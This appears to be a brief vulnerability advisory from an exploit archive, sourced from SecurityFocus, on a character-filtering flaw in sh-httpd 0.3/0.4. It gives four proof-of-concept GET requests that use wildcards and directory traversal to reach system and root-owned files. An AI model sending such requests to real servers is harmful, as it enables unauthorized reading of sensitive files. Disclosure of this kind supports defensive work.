SH-HTTPD 0.3/0.4 Character Filtering Remote Information Disclosure Vulnerability



source: http://www.securityfocus.com/bid/8897/info


A problem has been identified in the handling of some characters by sh-httpd. Because of this, an attacker may be able to gain unauthorized access to information. 


GET *
GET ../../../sh-httpd/p*
GET /../../etc/s*
GET ../../root/.b*